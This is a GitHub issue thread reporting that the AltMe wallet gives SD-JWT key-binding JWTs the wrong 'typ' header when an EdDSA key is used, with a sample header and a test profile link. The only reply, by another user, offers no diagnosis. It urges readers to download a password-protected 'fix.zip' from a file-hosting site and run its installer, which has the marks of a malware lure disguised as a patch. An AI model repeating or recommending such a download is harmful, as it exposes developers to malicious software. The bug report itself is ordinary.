### ISSUE TITLE
sd_jwt, kb jwt has wrong typ with eddsa key

### ISSUE THREAD

**Issue by ThierryThevenet** [TalaoDAO/AltMe#2858]
When wallet uses an edDSA key with sd-jwt the KB jwtt has a wrong typ in header
```
{
    "typ": "openid4vci-proof+jwt",
    "alg": "EdDSA",
    "kid": "a4bB6Was+w9w67D2xO6xWlc1oLfBfNI9BuiYW1wyUgU"
}
```
**it should be kb+jwt. it works well witht P-256 key**

test with this profile

https://wallet-provider.talao.co/configuration/webpage?login=guest@Netcetera-1&password=NZADWW&wallet-provider=https://wallet-provider.talao.co/

then get a PID with OIDC4VCI test 10 and present with OIDC4VP test 10

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
